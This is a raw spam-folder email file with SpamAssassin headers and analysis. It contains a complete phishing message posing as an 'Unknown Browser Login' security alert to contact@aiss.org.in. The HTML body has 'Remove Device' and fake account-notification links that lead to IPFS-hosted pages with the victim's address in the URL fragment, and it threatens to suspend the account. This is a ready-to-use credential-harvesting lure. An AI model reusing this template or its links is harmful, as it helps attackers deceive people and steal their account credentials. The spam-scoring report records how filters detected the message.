| DIR: /home/aissorg/mail/.spam/new /home/aissorg/mail/.spam/new/ |
| Current File : /home/aissorg/mail/.spam/new/1757297921.M495466P1580952.v22437909.sin01.serveradd.com,S=9201,W=9352 |
Return-Path: <admin@server.com>
Delivered-To: aissorg+spam@v22437909.sin01.serveradd.com
Received: from v22437909.sin01.serveradd.com
by v22437909.sin01.serveradd.com with LMTP
id 8IltHQE9vmiYHxgA+povcg
(envelope-from <admin@server.com>)
for <aissorg+spam@v22437909.sin01.serveradd.com>; Mon, 08 Sep 2025 10:18:41 +0800
Return-path: <admin@server.com>
Envelope-to: contact@aiss.org.in
Delivery-date: Mon, 08 Sep 2025 10:18:41 +0800
Received: from [116.206.192.132] (port=32885 helo=server.com)
by v22437909.sin01.serveradd.com with esmtp (Exim 4.98.2)
(envelope-from <admin@server.com>)
id 1uvRSn-00000006dIw-3yiG
for contact@aiss.org.in;
Mon, 08 Sep 2025 10:18:41 +0800
From: aiss.org.in<admin@server.com>
To: contact@aiss.org.in
Date: 8 Sep 2025 08:47:57 +0630
Message-ID: <20250908084756.A74708C9C0B37CF5@server.com>
MIME-Version: 1.0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Spam-Status: Yes, score=29.3
X-Spam-Score: 293
X-Spam-Bar: +++++++++++++++++++++++++++++
X-Spam-Report: Spam detection software, running on the system "v22437909.sin01.serveradd.com",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
root\@localhost for details.
Content preview: Hello aiss.org.in, We noticed a device added to your contact@aiss.org.in
account and was logged in from Client IP : 100.43.72.255 , Russia on an Windows
OS - Firefox device on 9/8/2025 8:47:56 a.m. UTC.
Content analysis details: (29.3 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked.
See
http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
for more information.
[URI: bafybeihpu7bs5efeao6fbiropdu6rmlfb37fqvavxxkjjg5hrap7pdnola.ipfs.dweb.link]
[URI: ipfs.io]
[URI: aiss.org.in]
0.0 KAM_DMARC_STATUS Test Rule for DKIM or SPF Failure with Strict
Alignment
0.5 URI_NOVOWEL URI: URI hostname has long non-vowel sequence
0.0 T_MXG_EMAIL_FRAG BODY: URI with email in fragment
0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
0.1 HTTPS_HTTP_MISMATCH BODY: No description available.
0.0 HTML_MESSAGE BODY: HTML included in message
0.0 URI_DWEBIPFS References Interplanetary File System PtP content via
dweb.link, likely phishing
1.0 KAM_LAZY_DOMAIN_SECURITY Sending domain does not have any
anti-forgery methods
2.0 RDNS_NONE Delivered to internal network by a host with no rDNS
0.0 KAM_SHORT Use of a URL Shortener for very short URL
18 KAM_IPFS Abused Protocol for Distributed Content
2.5 URI_IPFSIO References Interplanetary File System PtP content via
ipfs.io, likely phishing
0.0 URI_IPFS References Interplanetary File System PtP content, probable
phishing
0.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML only
0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[116.206.192.132 listed in sa-trusted.bondedsender.org]
0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[116.206.192.132 listed in bl.score.senderscore.com]
0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[116.206.192.132 listed in sa-accredit.habeas.com]
5.0 KAM_SOMETLD_ARE_BAD_TLD .bar, .beauty, .buzz, .cam, .casa, .cfd,
.club, .date, .guru, .link, .live, .monster,
.online, .press, .pw, .quest, .rest, .sbs,
.shop, .stream, .top, .trade, .wiki, .work,
.xyz TLD abuse
X-Spam-Flag: YES
Subject: Unknown Browser Login Today 9/8/2025 8:47:56 a.m.
<html><head>
<meta name=3D"GENERATOR" content=3D"MSHTML 11.00.9600.19003">
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge">
</head>
<body>
<div style=3D"text-align: center; color: rgb(34, 34, 34); text-transform: n=
one; line-height: 20px; text-indent: 0px; letter-spacing: normal; padding-t=
op: 20px; font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-=
style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; or=
phans: 2; widows: 2; background-color: rgb(255, 255, 255); font-variant-lig=
atures: normal; font-variant-caps: normal; text-decoration-style: initial; =
text-decoration-color: initial;=20
-webkit-text-stroke-width: 0px; text-decoration-thickness: initial;"><font =
face=3D"arial, sans-serif">Hello aiss.org.in,<br><br>We noticed a devi=
ce added to your contact@aiss.org.in account and was logged in from Client =
IP : <span style=3D"color: rgb(0, 0, 0); font-size: 16px;"><b>10=
0.43.72.255</b></span> ,<b> Russia </b> on an&nb=
sp;<span> </span><span id=3D"gmail-opsder">Windows OS</span><span>&nbs=
p;</span>-<span> </span><span id=3D"gmail-kolo">
Firefox</span> device on 9/8/2025 8:47:56 a.m. UTC.<br></font><div sty=
le=3D"line-height: 20px; padding-top: 20px;"><div style=3D"padding-top: 32p=
x;">
<a style=3D"padding: 10px 24px; border-radius: 5px; color: rgb(255, 255, 25=
5); line-height: 16px; display: inline-block; min-width: 90px; background-c=
olor: rgb(65, 132, 243); text-decoration-line: none;" href=3D"https://ipfs.=
io/ipfs/bafkreidit7vep7weohh2jeah4y3jigpocrsdmc3z24virfxfvowv4smbeu#contact=
@aiss.org.in" target=3D"_blank"=20
data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://bafybeihpu7b=
s5efeao6fbiropdu6rmlfb37fqvavxxkjjg5hrap7pdnola.ipfs.dweb.link/index2mrj090=
9.html%23%5B%5B-Email-%5D%5D&source=3Dgmail&ust=3D1757357140411000&=
amp;usg=3DAOvVaw1wR24UjqqVjo-tlUXHs89N"><font face=3D"arial, sans-serif">Re=
move Device</font></a></div></div><font face=3D"arial, sans-serif"><br>
If you do not recognise this device, click Remove device, follow steps=
to logout contact@aiss.org.in from an unknown device.=
<br><br><b>After successful device logout, you will receive confirmation em=
ail automatically.<br></b><br><b>Repeat process if no email confirmation is=
received.</b></font></div>
<div style=3D"text-align: center; color: rgb(95, 99, 104); text-transform: =
none; line-height: 16px; text-indent: 0px; letter-spacing: 0px; padding-top=
: 20px; font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-st=
yle: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orph=
ans: 2; widows: 2; background-color: rgb(255, 255, 255); font-variant-ligat=
ures: normal; font-variant-caps: normal; text-decoration-style: initial; te=
xt-decoration-color: initial;=20
-webkit-text-stroke-width: 0px; text-decoration-thickness: initial;"><font =
face=3D"arial, sans-serif">You can also activate all security notifica=
tions at<br>
<a style=3D"color: rgb(17, 85, 204);" href=3D"https://ipfs.io/ipfs/bafkreid=
it7vep7weohh2jeah4y3jigpocrsdmc3z24virfxfvowv4smbeu#contact@aiss.org.in" ta=
rget=3D"_blank" data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttp=
s://bafybeihpu7bs5efeao6fbiropdu6rmlfb37fqvavxxkjjg5hrap7pdnola.ipfs.dweb.l=
ink/index2mrj0909.html%23%5B%5B-Email-%5D%5D&source=3Dgmail&ust=3D1=
757357140411000&usg=3DAOvVaw1wR24UjqqVjo-tlUXHs89N">https://myaccount.a=
iss.org.in<wbr>/notifications</a></font></div>
<div style=3D"text-align: center; color: rgb(95, 99, 104); text-transform: =
none; line-height: 16px; text-indent: 0px; letter-spacing: 0px; padding-top=
: 20px; font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-st=
yle: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orph=
ans: 2; widows: 2; background-color: rgb(255, 255, 255); font-variant-ligat=
ures: normal; font-variant-caps: normal; text-decoration-style: initial; te=
xt-decoration-color: initial;=20
-webkit-text-stroke-width: 0px; text-decoration-thickness: initial;"><font =
face=3D"arial, sans-serif">If no action is taken, we will suspend your emai=
l temporarily to secure your account.</font></div></body></html>
|